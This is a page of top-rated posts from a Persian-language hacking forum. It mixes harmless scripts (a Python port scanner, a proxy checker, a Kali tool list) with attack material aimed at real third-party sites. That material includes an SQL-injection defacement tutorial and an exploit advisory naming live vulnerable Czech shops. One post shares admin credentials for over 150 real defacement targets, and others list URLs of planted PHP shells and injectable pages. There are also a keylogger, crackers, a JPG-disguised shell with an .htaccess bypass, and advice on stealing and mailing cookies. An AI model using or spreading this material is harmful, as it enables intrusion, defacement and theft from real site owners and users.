پرچمداران


مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز از زمان ۱۹/۰۱/۱۹ در همه بخش ها

  1. 9 امتیاز
    بسمه تعالی با سلام خدمت کاربران عزیز انجمن گاردایران امروز تصمیم گرفتم که با استفاده از یک دورک و حمله از طریق باگ Sql Injection آموزشی در خصوص نفوذ و دیفیس یک وبسایت خارجی تهیه کنم براتون. ابزار ها رو هم پیوست کردم. به ویدیو دقت کنید. هر سوالی داشتید اینجا تاپیک بذارید تا جواب بدم: http://guardiran.org/forums/forum/19-سوال-و-جواب-های-نفوذ-به-سایت-ها-و-سرورها-و-روشهای-مقابله/ ابزارها : Sqli Dumper Admin Login Finder دورک : Issue.php?categoryID= ویدیو آموزشی و فایل ها در 8 پارت هست رمز عبور : guardiran.org How to Hack a website with Sql Injection - Guardiran Security Team.part04.rar How to Hack a website with Sql Injection - Guardiran Security Team.part01.rar How to Hack a website with Sql Injection - Guardiran Security Team.part02.rar How to Hack a website with Sql Injection - Guardiran Security Team.part03.rar
  2. 8 امتیاز
    In The Name Of God با سلام خدمت دوستان و مدیران عزیز : اسکریپتی که قرار میدم اسکریپت پورت اسکنر هست و فوق العاده ساده و کاربردی و کم حجم به زبان پایتون هست ! تمام پورت های باز یک سایت فقط با وارد کردن ادرس سایت به شما نشون میده ! (البته اینم اضافه کنم نمونه کامل این اسکریپت میشه ابزار قوی انمپ که خب گفتم این هم بزارم برای تازه وارد ها بد نیست) #!/usr/bin/env python import socket import subprocess import sys from datetime import datetime # Clear the screen subprocess.call('clear', shell=True) # Ask for input remoteServer = raw_input("Enter a remote host to scan: ") remoteServerIP = socket.gethostbyname(remoteServer) # Print a nice banner with information on which host we are about to scan print "-" * 60 print "Please wait, scanning remote host", remoteServerIP print "-" * 60 # Check what time the scan started t1 = datetime.now() # Using the range function to specify ports (here it will scans all ports between 1 and 1024) # We also put in some error handling for catching errors try: for port in range(1,1025): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((remoteServerIP, port)) if result == 0: print "Port {}: Open".format(port) sock.close() except KeyboardInterrupt: print "You pressed Ctrl+C" sys.exit() except socket.gaierror: print 'Hostname could not be resolved. Exiting' sys.exit() except socket.error: print "Couldn't connect to server" sys.exit() # Checking the time again t2 = datetime.now() # Calculates the difference of time, to see how long it took to run the script total = t2 - t1 # Printing the information to screen print 'Scanning Completed in: ', total اگر استقبال شد اسکریپت های اسکن پشرفته تری میزارم و اگر جایی از کد نیاز به توضیح داشت درخدمتم !
  3. 8 امتیاز
    پارت های 5 الی 8 : How to Hack a website with Sql Injection - Guardiran Security Team.part07.rar How to Hack a website with Sql Injection - Guardiran Security Team.part08.rar How to Hack a website with Sql Injection - Guardiran Security Team.part05.rar How to Hack a website with Sql Injection - Guardiran Security Team.part06.rar
  4. 8 امتیاز
    ############################################ # Title : WebCzech CMS Sql Injection Vulnerability # Author : Guardiran Security Team # category : webapps # Tested On : Win 10 , Kali Linux # Vendor HomePage : https://www.webczech.cz # Google Dork : intext:"e-shop system WebCzech " inurl:/.php?id= ############################################ # PROF: http://www.general-store.cz/static.php?id=5' [Sql injection Vulnerability] http://www.kozena-penezenka.cz/static.php?id=13'[Sql injection Vulnerability] http://eshop.pozarnizbrojnice.cz/static.php?id=1'[Sql injection Vulnerability] http://www.restaurace-retro.cz/eshop/static.php?id=1'[Sql injection Vulnerability] # Discovered by : sir shahroukh ############################################ https://cxsecurity.com/issue/WLB-2019010203 ############################################
  5. 7 امتیاز
    سلام امروز یک کرکر واسه بازی پر طرفدار زولا نوشتم امیدوارم خوشتون بیاد اینم لینک اسکن https://www.virustotal.com/#/file/db1941c76e8dbf710e97f52a98e3e08ad76203c23f146cab9236c53d0131c1e9/detection ZAC.py
  6. 7 امتیاز
    In The Name Of God سلام خدمت دوستان عزیز امروز با آموزش پیدا کردن موقعیت مکانی تارگت از طریق عکس آپلود شده در خدمت شما هستم ! در این آموزش ما با ابزار exiftool آشنا خواهیم شد ! دستور نصب این ابزار در سیستم عامل لینوکس یا کالی لینوکس! apt-get install exiftool آموزش استفاده از ابزار : بعد از نصب کافیه در ترمینال تایپ کنید : exiftool عکس مورد نظر
  7. 7 امتیاز
    با سلام و خسته نباشید خدمت دوستان محترم و مدیران عزیز گفتم از قبل تاپیک به اسم کیلاگر هست دیگه الکی تاپیک جدید ایجاد نکنم ! دوستان یکی از بهترین کیلاگر های زندگیم با کمی ادیت در خدمت شما دوستان قرار میدم که با زبان دوست داشتنی پایتون نوشته شده و امیدوارم مورد قبول واقع بشه ! فقط لطفا قبل از استفاده فایل درباره من مطالعه بشه ! لینک اسکن = Scan Link Xenotix-Python-Keylogger-master.zip
  8. 7 امتیاز
    In The Name Of God ممنون دوستان عزیز خب اینبار یکم تخصصی ترش میکنیم اسکریپت و از گیت هاب میخوام بهتون یه اسکریپت جالب معرفی کنم به نام نت اسکن که همراه با لینک دانلود لینک اسکنش هم قرار میدم لطفا قبل از استفاده فایل درباره من حتما مطالعه کنید ! لینک اسکن : Scan Link Nscan-master.zip
  9. 6 امتیاز
    In The Name Of God با سلام خدمت دوستان و مدیران عزیز ! دیدم هر نوع تاپیکی تو بخش کالی لینوکس داریم بجز آشنایی مبتدی و معرفی ابزار ها گفتم یه اطلاعاتی هم راجبهش بزارم بدک نیست ! این هم اضافه کنم در کنارش اگر کسی در هرکدام از ابزار هایی که معرفی میشه و نام برده شده راهنمایی خواست یا آموزش در خواست بده تا در صورت موجود نبودن در انجمن تایپکش ایجاد بشه ! تمامی ابزار هایی که معرفی میشن به شما دوستان روی اسمشون کافیه در متن کلیک کنید تا به سایت سازنده یا سورس اون در گیت هاب دسترسی پیدا کنید ! خب بریم سراغ معرفی‌ : ابزارهای تست نفوذ : جمع آوری اطلاعات Arping : این ابزار به منظور ارسال درخواست های ARP به میزبان های موجود در یک سابنت خاص به کار می رود. Arp-Scan : این یک ابزار خط فرمان می باشد که برای اکتشاف سیستم و انگشت نگاری طراحی شده است. این ابزار درخواست های ARP را اسمبل کرده و به آدرس های آیپی تعیین شده ارسال می کند و همه پاسخ های دریافتی را نمایش می دهد. Ike-scan : این اسکنر میزبان های IKE را کشف کرده و به علاوه آنها را انگشت نگاری می کند. KnockPy : این یک اسکریپت پایتون می باشد که به منظور سرشماری زیردامنه ها بر روی دامنه هدف (از طریق لیست کلمات) طراحی شده است. Nbtscan : ابزاری به منظور اسکن و دریافت اطلاعات درباره شبکه های آیپی برای اطلاعات نام NetBIOS می باشد. SSLScan : یک اسکنر پورت SSL بسیار سریع است. این اسکنر به پورت های SSL متصل شده و رمزهای پشتیبانی شده را تشخیص داده که این رمزها , رمزهای ترجیح داده شده سرورها هستند و تشخیص داده که چه پروتکل های SSL ایی پشتیبانی می شوند و در نهایت گواهینامه SSL را باز می گرداند. Theharvester : ابزاری به منظور جمع آوری ایمیل ها , زیردامنه ها , اسامی میزبان و اطلاعات شخصی درباره افراد Zenmap : رابط گرافیکی ابزار مشهور Nmap می باشد. Dirs3arch : یک ابزار خط فرمان ساده می باشد که به منظور بروت فورس شاخه ها و فایل ها درون وبسایت ها طراحی شده است. WhatWeb : ابزاری است که به منظور تشخیص تکنولوژی های وب شامل سیستم های مدیریت محتوا , پلتفورم های بلاگینگ , کتابخانه های جاوا اسکریپت , وب سرورها و دیوایس های تعبیه شده طراحی شده است. ابزارهای تست نفوذ : ارزیابی آسیب پذیری OpenVAS : فریم ورکی تشکیل شده از چندین سرویس و ابزار به منظور ارایه راهکاری جامع در زمینه اسکن آسیب پذیری Nikto : یک اسکنر وب سرور می باشد که وب سرورها برای فایل های خطرناک , نرم افزارهای بروزنشده سرور و دیگر مشکلات تست می کند. Skipfish : یک ابزار شناسایی امنیتی فعال اپلیکیشن های وب می باشد. این ابزار نقشه سایت تعاملی را برای سایت هدف ارایه می کند و این کار را از طریق خزیدن و کاوشگرهای مبتنی بر دیکشنری انجام می دهد. Wapiti : ابزاری برای حسابرسی امنیتی اپلیکیشن های وب. این ابزار اسکن های جعبه سیاه را پیاده سازی می کند. این ابزار کد منبع برنامه ها را مطالعه نمی کند ولی صفحات وب را برای اسکریپت ها و فرم های قابل تزریق داده اسکن می کند. ZAP : اسکنر و جستجوگر قوی اپلیکیشن های وب که توسط OWASP پیاده سازی شده است. ابزارهای تست نفوذ : بکارگیری BeEF : مخفف The Browser Exploitation Framework . یک ابزار کارآمد تست نفوذ که بر روی مرورگر سمت کلاینت تمرکز دارد. این ابزار به نفوذگران متخصص اجازه می دهد تا به شیوه های گوناگون مرورگر سمت کاربر را بکارگیری کنیم. SQLMap : یک ابزار خودکار به منظور تشخیص و بکارگیری آسیب پذیری های تزریق اسکیوال Armitage : رابط گرافیکی فریم ورک متااسپلوییت Msfconsole : کنسول اصلی فریم ورک متااسپلوییت که دارای اکسپلوییت های زیادی می باشد. Fimap : یک ابزار بازرسی اپلیکیشن های وب برای باگ های file Inclusion در اپلیکیشن های وب wpScan : اسکنر آسیب پذیری سیستم مدیریت محتوای وردپرس ابزارهای تست نفوذ : ارتقا مجوزها ارتقا مجوزها زمانی انجام می شود که ما هم اکنون به سیستم دسترسی پیدا کردیم ولی مجوزهای دسترسی ما در سطح پایینی قرار دارند. ابزارهای مربوطه به شرح زیر هستند : Hashcat : سریع ترین ابزار ریکاوری پسورد مبتنی بر پردازنده MarkProcessor : کلمه ساز با کارایی بالا و قابلیت ایجاد کلمات بر مبنای موقعیت Chntpw : تغییر رمزعبور یک کاربر در فایل SAM در ویندوز یا فراخوانی ویرایشگر رجیستری. ابزاری برای ریست یا خالی کردن مقدار پسوردها Crunch : یک ابزار کلمه ساز که با استفاده از آن می توانید مجموعه کاراکتری استانداردی را تعیین کنید. Fcrackzip : یک کرکر پسورد سریع Hash-id : ابزاری برای شناسایی هش پسوردها Jhon : پسورد کرکر معروف Jhon the ripper Ophcrack : کرکر پسورد ویندوز مبتنی بر جداول رنگین کمانی Fang : یک کرکر MultiService Threaded MD5 Medusa : یک ابزار بروت فورس لاگین با سرعت بالا انجام موازی فرایندها , ماژولار و پشتیبانی از پروتکل های مختلف XHydra : رابط گرافیکی بهترین کرکر آنلاین و که قادر به پشتیبانی از پروتکل های زیر می باشد : TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, LDAP, SMB, SMBNT, MS-SQL, MySQL, REXEC, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, Cisco auth, Cisco enable, and Cisco AAA DriftNet : ابزاری که به ترافیک شبکه گوش کرده و تصاویر را از جریان TCP استخراج می کند. Dsniff : یک شنودگر ترافیک شبکه که ترافیک را آنالیز می کند . Ettercap : یک مجموعه کامل برای حملات شخص واسط MIM SSLSniff : یک شنودگر ترافیک SSL SSLStrip : شنودگری برای بسته های پروتکل SSL TCPdump : یک آنالیزور رایج بسته که مبتنی بر خط فرمان است. WireShark : ابزاری رایگان و متن باز برای آنالیز بسته های شبکه ARPSpoof : ابزاری با توانایی مسموم کردن میزبان ها از طریق درخواست ها و پاسخ های ARP DNSSpoof : دریافت پاسخ های dns قبل از رسیدن به روتر و جایگزینی آنها با پاسخ های جعلی Scapy : یک ابزار قدرتمند و تعاملی دستکاری بسته . دارای توانایی جعل و دکودینگ بسته ها با پشتیبانی از پروتکل های مختلف Yersinia : یک ابزار شبکه که به منظور بکارگیری برخی ضعف های موجود در پروتکل های شبکه طراحی شده است. ابزارهای تست نفوذ : حفظ دسترسی Cryptcat : یک ابزار نتکت که با رمزنگاری twofish بهبود یافته است. Iodine : یک ابزار رایگان تانلینگ به منظور هدایت ترافیک IPV4 به سرورهای دی ان اس Ncat : ابزار نتکت بهینه شده توسط تیم توسعه انمپ ProxyChains : ابزاری برای هدایت اجباری هر تماس TP ایجاد به پروکسی هایی همچون تور و دیگر انواع پروکسی SOCKS4 , SOCKS5 , HTTPS و… Ptunnel : اپلیکیشنی که به شما اجازه می دهد به صورت قابل اطمینان تماس های TCP را به یک میزبان ریموت تانل کرده . این کار از طریق بسته های درخواست و پاسخ ICMP انجام می شود. Weevely : یک وب شل مخفی PHP که ارتباطی شبیه تلنت را شبیه سازی می کند ابزارهای تست نفوذ : مستندسازی و گزارش دهی MagicTree : ابزاری که به شما اجازه می دهد تا به آسانی و به صورت مستقیم اثبات داده و ایجاد گزارش تست نفوذ را پیاده سازی کنید. ابزارهای تست نفوذ : مهندسی معکوس Binwalk یک ابزار آنالیز و تحلیل و مهندسی معکوس سریع به منظور استخراج ایمیج های firmware Dissy : رابط گرافیکی برای Objdump Disassembler Flasm : یک ابزار اسمبلر و دسمبلر مبتنی بر خط فرمان Ghex : یک ویرایشگر گرافیکی ساده هکس Nasm یک ابزار اسمبلر مبتنی بر شبکه Radar2 : یک فریم ورک مهندسی معکوس مبتنی بر یونیکس wxHexEditor : یک ویرایشگر هکس دیگر و کراس پلتفورم ابزارهای تست نفوذ : مهندسی اجتماعی Thpot : یک هانی پات کوچک به منظور نصب و راه اندازی سرویس های جعلی SEToolkit : جعبه ابزار رایج مهندسی اجتماعی که به منظور انجام حملات مهندسی اجتماعی در تعامل با اشخاص طراحی شده است. ابزارهای تست نفوذ : تست استرس Seige : ابزار تست رگرسیون (Regression Test)HTTP و ابزار بنچ مارکینگ Slowhttptest : ابزار با قابلیت بالای پیکربندی که حملات DOS را شبیه سازی می کند. ابزارهای تست نفوذ : آنالیز اتومبیل Can-Utils : کن CAN یک پروتکل شبکه مبتنی بر پیام می باشد که برای اتومبیل طراحی شده استCanUtils حاوی مجموعه ای از ابزارهای متن باز می باشد که برای تست نفوذ اتومبیل طراحی شده است. ابزارهای تست نفوذ : آنالیز فارنزیک Dcfldd : این یک نسخه بهینه شده از ابزار dd می باشد که دارای ویژگی های مفیدی برای فارنزیک و امنیت می باشد. Ddrescue : ابزار ریکاوری داده می باشد که داده ها را کپی کرده و سعی در بازیابی داده ها از فایل یا دیوایس ها می کند. Guymager : یک ابزار سریع و کاربرپسند تصویربردار فارنزیک می باشد که بر اساس کتابخانه های libewf و libguytools می باشد. Foremost : یک اپلیکیشن کنسول می باشد که در بازیابی فایل بر اساس هدرها , فوترها و ساختار داخلی فایل ها به محققین فارنزیک کمک می کند. Photorec : یک نرم افزار بازیابی داده می باشد که به صورت اختصاصی بر روی بازیابی تصاویر از دوربین های دیجیتال تمرکز دارد. (CompactFlash و Memory Stick و Secure Digital و SmartMedia) و … Scalpel : یک ابزار کارور که به منظور بازیابی داده های حذف شده از سیستم ها کاربرد دارد. Testdisk : یک ابزار رایگان برای بازیابی داده ها DFF : یک ابزار جمع آوری داده ها برای اهداف فارنزیک Steghide : یک نرم افزار استگانوگرافی می باشد که به منظور مخفی کردن داده ها موجود در تصاویر و فایل های صوتی کاربرد دارد. Vinetto : فایل های Thumbs.db را برای اهداف فارنزیک آزمون می کند. ابزارهای تست نفوذ : آنالیز بدافزار Pyew : یک ابزار آنالیز بدافزار مبتنی بر پایتون می باشد. Yara : ابزاری که به محققین بدافزار کمک کرده تا نمونه های بدافزار را شناسایی و دسته بندی کنند. Volatility : یک فریم ورک پیشرفته فارنزیک حافظه می باشد. ابزارهای تست نفوذ : آنالیز موبایل ADB : مخفف Android Debug Bridge یک ابزار خط فرمان که به شما اجازه داده تا با یک شبیه ساز اندروید یا یک دیوایس واقعی اندروید ارتباط برقرار کنید. Apktool : ابزاری سوم شخص برای مهندسیی معکوس اپلیکیشن های اندروید می باشد. ابزارهای تست نفوذ : آنالیز VOIP Sipcrack : مجموعه ای از ابزارها برای شنود و کرک پروتکل های SIP می باشد ابزارهای تست نفوذ : آنالیز وایرلس Aircrack-ng : مجموعه ای از نرم افزارهای شبکه شامل یک ردیاب , شنودگر بسته , کرکر WEP و WPA/WPA2-PSK و ابزار آنالیز برای 802.11 Pyrit : یک ابزار کرکر مبتنی بر GPU برای کلیدهای WPA و WPA2-PSK Reaver : اپلیکیشنی برای انجام حملات بروت فورس بر روی وایفای و WPS Wifite : یک ابزار خودکار حسابرسی بی سیم Kismet : شناسه گر شبکه های بی سیسم لایه دو 802.11 ابزارهای تست نفوذ : متفرقه Hping3 : یک آنالیزور و اسمبلر خط فرمان بسته ها مبتنی بر TCP/IP می باشد Macchanger : ابزاری رایج به منظور جعل سریع مک آدرس Ndiff : ابزاری برای مقایسه اسکن های Nmap می باشد. Nping : ابزاری برای ایجاد بسته های شبکه , تحلیل پاسخ ها و اندازه گیری زمان پاسخ می باشد. خب امیدوارم که مفید واقع بشه !
  10. 6 امتیاز
    In The Name Of God اسکریپت کرک پنل وردپرس که خیلی سریعتر از بقیه اسکریپت ها عمل میکنه ! لینک اسکن = Scan Link wp.py
  11. 6 امتیاز
    درود دقیق هدفتون از این کار چیه ؟ باید در نظر داشته باشی که هر سایت به کوکی های هاست و دامنه خودش در مرورگر دسترسی داره ! یعنی صرفا جنبه نفوذ به کلاینت رو نداره ! مگر کد های مخربی بنویسی که سمت کلاینت اجرا بشن . با این تفاسیر : کوکی ها در آرایه سوپر گلوبال کوکی در پی اچ پی ذخیر میشن و می تونی با syntax زیر بهشون دسترسی پیدا کنی $_COOKIE['cookiename'] بعد از اون با استفاده از تابع mail() که در کتابخانه استاندارد پی اچ پی موجود هست می تونی ایمیل ارسال کنی ، لازم به ذکره mail از smtp پیش فرض سرور استفاده میکنه ، برای آپشن های حرفه ای تر میتونی از کتابخانه هایی مثل پی اچ پی میلر و غیره استفاده کنی
  12. 5 امتیاز
    In The Name Of God اسکریپت پروکسی چکر به زبان پایتون و یکی از ساده ترین اسکریپت های موجود هست باز هم اگر جایی نیاز به توضیح داشت بپرسید در خدمتم دوستان ! import requests import bs4 import time from threading import Thread from Queue import Queue import sys def proxy_check(proxy): try: proxy = proxy.rstrip() proxy_judge = "http://www.proxyjudge.info/" # any proxy judge can go here proxyy={"http": "http://"+proxy} r = requests.get(proxy_judge,proxies= proxyy,timeout=10) soup = bs4.BeautifulSoup(r.content,"html.parser") data = soup.find_all("body") for item in data: #Low anonymity if "HTTP_X_FORWARDED_FOR" in item.text and "HTTP_X_FORWARDED_FOR = unknown" not in item.text : if("L" in sys.argv[3]): poxy_save_file = open(sys.argv[2], 'a') poxy_save_file.write(str(proxy)+'\n') # save proxy to file poxy_save_file.close() print str(proxy) + " Low Alive" time.sleep(5.5) #Medium anonymity elif "HTTP_X_FORWARDED_FOR = unknown" in item.text: if("M" in sys.argv[3]): poxy_save_file = open(sys.argv[2], 'a') poxy_save_file.write(str(proxy)+'\n') # save proxy to file poxy_save_file.close() print str(proxy) + " Medium Alive" time.sleep(5.5) # High anonymity elif "HTTP_X_FORWARDED_FOR" not in item.text and "HTTP_X_FORWARDED_FOR = unknown" not in item.text and "REMOTE_ADDR" in item.text : if("H" in sys.argv[3]): poxy_save_file = open(sys.argv[2], 'a') poxy_save_file.write(str(proxy)+'\n') # save proxy to file poxy_save_file.close() print str(proxy) + " High Alive" time.sleep(5.5) else: time.sleep(5.5) except requests.exceptions.Timeout: time.sleep(.5) #print str(proxy) + " Dead" except: time.sleep(.5) #print str(proxy) + " Dead" time.sleep(.5) def get_proxy(i,q): #print "Starting thread [" + str(i)+"]\n" time.sleep(5) while True: proxy = q.get() # get proxy proxy_check(proxy) q.task_done() if(len(sys.argv) < 4): print("\n\nUsage: programe.py proxy_list.txt output_proxies.txt LMH \n\nType\n L = Low\n M = Med\n H = High\n") else: num_threads = 300 q_queue = Queue() for i in range(num_threads): # number of threads to spin up worker = Thread(target=get_proxy, args=(i,q_queue,)) worker.setDaemon(True) worker.start() with open(sys.argv[1]) as fp: for line in fp: q_queue.put(line) # put list in queue q_queue.join() # wehen queue is empty exit print 'Finished' این هم کل دستورات این اسکریپت و آپشن ها و نحوه فراخوانیش :‌ Usage: programe.py proxy_list.txt output_proxies.txt LMH Type L = Low M = Med H = High
  13. 5 امتیاز
    بیشتر از 150 تارگت برای دیفیس داره و حتی میتونید شل آپ کنید // به نام تیم ثبت کنید (پسورد رو عوض نکنید تا همه بتوانند استغاده کنند حتی برای موارد تمرینی و بقیه موارد) بعضی از تارگت ها رو لیست کردم اما همه تارگت ها در وندور مشخص هست user admin : admin password : 8426228jerry vendor : https://www.injerry.com/portfolio-web.php?PID=1 vendor : https://www.injerry.com/portfolio-web.php?PID=2 admin page : target/admin/login.php بعضی از تارگت ها : http://shonshenc.com http://www.chapond.com http://www.knowfate.com.tw http://www.hsdiffuser.com
  14. 5 امتیاز
    پروژه PyCk یک کالکسیون از ابزارهای بدرد بخور پایتون در زمینه هکینگ رو در خودش داره البته شاید زیاد ابزارها حرفه ای نباشن چون جنبه آموزشی هم دارن و برای کسایی که میخوان تست نفوذ با پایتون رو یادبگیرن به شدت توصیه میشه... پیشنهاد میکنم یه نگاهی بهش بندازین https://github.com/Naategh/PyCk
  15. 5 امتیاز
    http://www.architecturalpapers.ch/index.php?ID=10
  16. 4 امتیاز
    Black Net.exe 👽 با سلام 👽 🤠 نرم افزار Black Elf 🤠 قابلیت های نرم افزار 🛠️ : 1- گرفتن Public IP با یک کلیک و بسیار سریع . 2- گرفتن Ping از سیستم و نمایش نتیجه . لینک اسکن برنامه 🌐 [کلیک و کشیدن برای جابجایی] برای حمایت از نرم افزار از دکمه Like استفاده کنید .🧡
  17. 4 امتیاز
    http://www.dacheng1971.com.tw/lyadmin/pages/uploads/image/pro_nlsjvu1i58.php http://www.gcomtw.com/lyadmin/pages/uploads/image/New_n2no66hgwe.php http://refined.com.tw/lyadmin/uploads/image/img1_epdo91agin.php http://www.nirey.com.tw/uploads/image/pic_hr0ssbj4fv.php
  18. 4 امتیاز
    سلام وقت بخیر با استفاده از اکستنشن curl در php میتونید با ارسال درخواست به یک سایت کوکی رو دریافت کنید <?php $ch = curl_init('http://www.google.com/'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 1); $result = curl_exec($ch); preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $result, $matches); // get cookie $cookies = array(); foreach($matches[1] as $item) { parse_str($item, $cookie); $cookies = array_merge($cookies, $cookie); } var_dump($cookies); ?> برای راحتی میتونید یک فرم با یک تکست باکس بگذارید و وقت سابمیت کردنش توسط متد post یا get مقدار رو به curl_init بدید
  19. 4 امتیاز
    درود اگه به کد نویسی تسلط دارید می تونید حلقه تعریف کنید و توی اون حلقه شرایط خاصی که باید پسورد لیستتون داشته باشه رو در نظر بگیرید با این حال یه سری برنامه password generator از پیش برای این مسائل نوشته شده که می تونید از اون ها هم استفاده کنید و راه حل Common تر : اگر سیستم عامل کالی لینوکس در دسترس دارید می تونید از ابزار crunch برای تولید لیستتون استفاده کنید
  20. 4 امتیاز
    به نام خدا اسکریپت اول : اسکریپت فول کرکر MD5 Md5 Cracker Full.py اسکریئت دوم : اسکریپت تبدیل پسورد به هش passtohash.py اسکریپت سوم : اسکریپت ادمین فایندر تخصصی admin.py اسکریپت چهارم : اسکریپت و کتاب خانه pip get-pip.py اگر مفید واقع شدند باز هم میزارم ! به امید دیدار !
  21. 4 امتیاز
    https://www.solcavsko.info/index.php?id=54'
  22. 4 امتیاز
    http://www.sedimental.com/catalog/index.php?ID=67
  23. 4 امتیاز
    http://www.icdcprague.org/index.php?id=10
  24. 3 امتیاز
    proxy

    بانک شل

    یه شل با فرمت jpg براتون میزارم که آپلودرهایی که به اندازه عکس و این چیزا گیر میدن رو بایپس میکنه ولی برای اینکه خودش به صورت jpg هم بتونه اجرا بشه باید این کد رو داخل .htaccess بزارید و اپلود کنید 😐 <FILESMATCH "^.*/.jpg"> SetHandler application/x-httpd-php </FILESMATCH> shell.rar
  25. 3 امتیاز
    دوست عزیز اگه به سرور سایت دسترسی داری دیگه هدفت ازینکه کوکی رو بدزدی چیه ؟؟ کافیه یه شل آپلود کنی تا سیملینک بزنه به Config و دسترسی به دیتابیس و تمام داده های اون رو بگیری سینتکس کد بالا درست نیست ، با کئوری استرینگ که کوکی رو نمیگرن به شما گفتم در چه ارایه ای ذخیره میشه از زمانی که یادم میاد فعالیتت رو شروع کردی چند ماهی میگذره ؛ اون موقع هم گفتم که مباحث رو از پایه یاد بگیر نه اینکه صرفا یه کدی رو از یه جایی برای انجام یه کاری به دست بیاری بنظرم خیلی بده که چند ماه بگذره و ادم هیچ پیشرفتی نداشته باشه الانم دیر نشده ، سراغ یاد گیری از پایه برو